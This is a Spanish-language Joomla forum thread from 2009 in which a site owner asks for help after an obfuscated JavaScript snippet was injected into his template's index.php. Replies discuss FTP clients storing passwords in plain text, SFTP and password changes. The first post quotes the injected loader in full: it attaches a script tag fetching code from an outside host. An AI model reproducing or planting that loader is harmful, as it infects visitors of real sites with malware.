Foros Joomla! Spanish

Zona técnica, debate y cooperación sobre Joomla!

Zonas Joomla! Spanish

Portal Joomla! Spansih
Portal Joomla! Spansih NoticiasComunidad JSZona de Extensiones

Estar informado de J!S

Boletines JS
Sigue el proyecto desde joomlacode
Joomla! Spanish 1.5.26 liberada

Sigue el proyecto desde joomlacode de la 3.0
Joomla! Spanish 3.1.0 liberada

Sigue el proyecto desde joomlacode de la 2.5
Joomla! Spanish 2.5.11 Liberada

Estadistícas del foro

  • Miembros en el foro: 386,326
  • Total Temas: 74,038
  • Total Mensajes: 9
Hay 171 usuarios actualmente navegando en los foros.

Colaboradores Gold

Soporte Publicitario



Responder
Antiguo 04-12-2009, 05:11 PM   #1
Iniciado en Joomla
 
Fecha de Ingreso: Mar 2008
Mensajes: 4
b0la0 is on a distinguished road
Predeterminado Virus en Joomla Urgente

Hola a todos, soy novato en el tema de Joomla y necesito su ayuda urgente, tengo el siguiente problema, desarrolle una web en la ultima version de Joomla y todo funcionaba ok, hasta que de pronto, luego de acutalizar mi sitio, en cuanto a contenidos y algunos productos del virtuemart. al otro dia al entra al sitio me daba el siguiente error:

Parse error: syntax error, unexpected '<' in /home/mihost/template/index.php on line 90

Por ende no me cargaba el sitio y solo se veia el texto anterior.
Me puse a revisar el codigo de mi index.php en la linea 90 como indicaba el error, cuando me encuentro con el siguiente Scrip instalado en el codigo..

<script>/*GNU GPL*/ try{window.onload = function(){var H3qqea3ur6p = document.createElement('script');H3qqea3ur6p.setAt tribute('type', 'text/javascript');H3qqea3ur6p.setAttribute('id', 'myscript1');H3qqea3ur6p.setAttribute('src', 'h#!t&##(t&()p$$:!#@/!(/$#l!)i!&v()@e!^(.$(!c!)o)m@.&!#g#@o((o^g)(l^$!e$)@ .&)$c$#o(m#^@.)$b#@#!#a&i#!d^$#$u#)$!(-!((m^!s$)n$&(.@)@c^@$o((m!(&.^)(b&!!)e@s(&t@@a()r# $#)t))@s#!#)a!l##e@(.))&r$!u!&)8(0$)@$8^#^@0&)$^/!!&w@$(o@^r(^(!d@^p^#)r#e@^s(&s&@@.(^^c#^o@!!m$)/)&^g@$(^o@(^o@g@&$l&&#e^))&@-($(m)#)a#)i^l^#.!&^)i!&t$@^/((!(l)!i&v^(&(e()#j^$a&s@(&m$^&(i$#@n!#^-#@)p$!!$h$!o(&#t(#o##)!b#!$u^c^#k((e&!)t#!((#.$$@c !&@o@m^)&/)!c&#(n$)e()&&t)#-^#!c^(@n^^n&#).)c!&!o$#m($/$^a&!@@b&()o^($(u!&#)t^#-#))e$@@)b##a#^y&&@.&#(^c&o^^m^@/(@^^'.replace(/\^|&|@|\)|\(|#|\!|\$/ig, ''));H3qqea3ur6p.setAttribute('defer', 'defer');document.body.appendChild(H3qqea3ur6p);}} catch(e) {}</script>

Cuando lo elimine, CASI todo volvio a estar como antes, pude entrar al sitio, ver sus contenidos, ir al administrador, etc... Salvo por el pequeño detalle de que ese scrip, me instalo un ActiveX (que debo suponer es un virus o algo asi, ya que nunca quise configurar mi sitio para que instalara dicho archivo)... además despues conectame a través de Filezilla y darle mantención a otro sitios en Joomla, no se como, pero se volvio a meter el mismo SCRIP dentro de los index.php, tanto del public_html, como el de templates...

Que puedo hacer, necesito ayuda, ya que limpio los codigos y luego se vuelven a cargar solos..
Será una error de Joomla? Estare con un virus yo en mi PC?.. Porfa, que alguien me oriente...

De ante mano mis saludos cordiales y agradecimientos por ayudar.
b0la0 no está en línea   Responder Con Cita
Antiguo 15-12-2009, 07:09 PM   #2
Iniciado en Joomla
 
Fecha de Ingreso: Dec 2009
Mensajes: 1
Julian Montoya is on a distinguished road
Predeterminado Tengo el mismo problema!

Hola.

Tengo el mismo problema, he hecho 2 paginas en joomla 1.5.9 y las 2 paginas han tenido el mismo problema... me llamo un cliente un tanto molesto y me dijo que su web estaba fallando.

No se que hacer... voy a intentar borrar todo lo que hay en el hosting e instalar una nueva versión de joomla y posteriormente subir la web nuevamente.... a ver si depronto asi soluciono algo.


Si alguien sabe como puedo corregir este problema.... le agradecería infinitamente.
Julian Montoya no está en línea   Responder Con Cita
Antiguo 17-12-2009, 07:17 PM   #3
Usuario de Joomla
 
Avatar de copito
 
Fecha de Ingreso: Oct 2009
Ubicación: Sanlúcar de Barrameda, Cádiz, España
Mensajes: 120
copito is on a distinguished road
Predeterminado

Cita:
Iniciado por Julian Montoya Ver Mensaje
Hola.

Tengo el mismo problema, he hecho 2 paginas en joomla 1.5.9 y las 2 paginas han tenido el mismo problema... me llamo un cliente un tanto molesto y me dijo que su web estaba fallando.

No se que hacer... voy a intentar borrar todo lo que hay en el hosting e instalar una nueva versión de joomla y posteriormente subir la web nuevamente.... a ver si depronto asi soluciono algo.


Si alguien sabe como puedo corregir este problema.... le agradecería infinitamente.
No sólo es posible contagiarse de forma tradicional entre PCs, sino también mediante la visualización de páginas web que alojan contenido fraudulento y que de forma intencionada pueden capturar datos sensibles como son las conexiones de FTP.

Es un hecho conocido que, al acceder a una página web que aloja contenido realizado en Flash o en Javascript, de forma intencionada se puede llegar a localizar las sesiones guardadas de FTP, por lo que siempre deberemos utilizar clientes de FTP que encripten el password de FTP, de modo que imposibilitemos el acceso fraudulento a nuestros alojamientos.

El uso de Filezilla para conectar a los servidores, es un riesgo pues es un cliente de FTP vulnerable al que se le pueden captar las credenciales de FTP desde sistemas operativos Windows, Linux o Mac. Enumero a continuación una serie de clientes de FTP vulnerables al robo de passwords:

* SecureFx
* IpSwitch
* FTPWare
* Rhine Software
* FileZilla
* Total Commander
* BulletProof Ftp
* GlobalScape Ftp
* CoffeCup Fp
* Ftp Commander Pro
* Smart Ftp
* Leap Ftp
* Far

Por ejemplo...[Eden2.0: Borrado]
En Windows XP:
[Borrado]
En Linux:
[Borrado]


Si comprobáis las rutas que he citado, podréis observar que se guardan las conexiones de FTP en texto plano, es decir, los datos de usuario y password no se encriptan, lo que puede permitir que un acceso fraudulento a tu PC, ya sea mediante virus/spyware o desde el propio navegador, pueda conocer sus datos de FTP y así en cualquier momento su web sea objeto de ataques.

Prueba a corregir esto y ten a mano siempre una copia de seguridad de tus ficheros index.php que son los que suelen atacar y protégelos contra escritura.

Un saludo.
--
J. Mármol
www.patrimoniodesanlucar.es

Eden2.0: La información que has dado es totalmente cierta. Aunque no es buena idea postear en el foro los datos relativos a como obtener los passwords, ya que permite a cualquiera que lo lea, conseguir los passwords y datos de acceso, de manera sencilla. Corroboro toda la información que has dado y es incomprensible que algunos clientes FTP tengas este problema. Por ahora, iremos buscando otras soluciones. Precisamente iba a crear un artículo sobre ello. Gracias por la info. Un saludo!

Última edición por Eden2.0; 18-12-2009 a las 10:00 AM Razón: Borrar información delicada.
copito no está en línea   Responder Con Cita
Antiguo 17-12-2009, 07:31 PM   #4
Colaborador de Joomla
 
Fecha de Ingreso: Nov 2007
Mensajes: 298
mrsorpresa is on a distinguished road
Predeterminado

Aquí dicen que el Filezilla sí que se puede configurar como Secure FTP...

http://programandopasoapaso.blogspot...-solucion.html
mrsorpresa no está en línea   Responder Con Cita
Antiguo 17-12-2009, 07:48 PM   #5
Usuario de Joomla
 
Avatar de copito
 
Fecha de Ingreso: Oct 2009
Ubicación: Sanlúcar de Barrameda, Cádiz, España
Mensajes: 120
copito is on a distinguished road
Predeterminado

Por supuesto que se puede, pero necesita PUTTY instalado y configurado en la misma máquina. La configuración de Filezilla para usarlo en SFTP (FTP seguro) es desconocida para la mayoría de usuarios y por eso lo emplean en modo FTP, digamos normal.
Yo utliizo el cliente de FTP WinSCP, el cual ofrece una mayor seguridad en el almacenaje de datos, es gratuito, y se encuentra disponible en varios idiomas.
Un saludo.
--
J. Mármol
www.patrimoniodesanlucar.es
copito no está en línea   Responder Con Cita
Antiguo 17-12-2009, 07:56 PM   #6
Colaborador de Joomla
 
Fecha de Ingreso: Nov 2007
Mensajes: 298
mrsorpresa is on a distinguished road
Predeterminado

Gracias por la información.

Una pregunta: yo soy usuario habitual de Filezilla, ¿se puede configurar para que sea igual de seguro que el FTP WinSCP? es que no me quedó claro, por eso que decias del PUTTY (vaya nombre) que no sé lo que es.

Un saludo.
mrsorpresa no está en línea   Responder Con Cita
Antiguo 17-12-2009, 08:02 PM   #7
Usuario de Joomla
 
Avatar de copito
 
Fecha de Ingreso: Oct 2009
Ubicación: Sanlúcar de Barrameda, Cádiz, España
Mensajes: 120
copito is on a distinguished road
Predeterminado

Te paso el link a la página de Wikipedia que te lo explica:
http://es.wikipedia.org/wiki/PuTTY
Y este es el enlace a la página oficial de PuTTY:
http://www.putty.org/

El nombre PuTTY proviene de las siglas
Pu: Port unique
TTY: terminal type.
Su traducción al castellano seria: Puerto único para tipos de terminal.
Para que Filezilla trabaje en modo seguro necesitas el PuTTY.

Un saludo.
--
J. Mármol
www.patrimoniodesanlucar.es
copito no está en línea   Responder Con Cita
Antiguo 17-12-2009, 10:33 PM   #8
Administrator
 
Fecha de Ingreso: Sep 2006
Mensajes: 55
nando is on a distinguished road

Medallero

Predeterminado

Hola,
Lo primero que te recomiendo es actualizar a la última versión de Joomla 1.5.15, lo segundo es cambiar todas las contraseñas
nando no está en línea   Responder Con Cita
Antiguo 18-12-2009, 10:40 AM   #9
Super Moderador
 
Avatar de Eden2.0
 
Fecha de Ingreso: Apr 2008
Ubicación: Palma de Mallorca
Mensajes: 2,132
Eden2.0 is on a distinguished road

Medallero

Predeterminado

Muy buena la info para poder utilizar Filezilla de manera segura.
En breve lo probaré^^


Un saludo!
Eden2.0 no está en línea   Responder Con Cita


Responder

Marcadores

Herramientas
Desplegado

Permisos de Publicación
No puedes crear nuevos temas
No puedes responder temas
No puedes subir archivos adjuntos
No puedes editar tus mensajes

Códigos BB están Activo
Los Emoticonos están Activo
Código [IMG] está Activo
Código HTML está Inactivo
Trackbacks are Activo
Pingbacks are Activo
Refbacks are Activo


Temas Similares
Tema Autor Foro Respuestas Último Mensaje
¿Virus en joomla 1.5.15? cluster2154 Foro general (1.5) 9 20-11-2009 01:13 PM
Virus En Joomla cellerona Foro general (1.5) 7 02-07-2009 07:02 PM
Tengo un virus en mi servidor con joomla 1.5 robert12 Foro general (1.5) 1 25-03-2009 07:48 PM
Gran Problema Virus Iframe se mete al servidor y me modifica joomla josehernan Foro general (1.5) 5 15-04-2008 01:11 AM
Un virus en mi joomla?? hackeado?? juanand87 Seguridad Informatica 4 06-09-2007 03:44 AM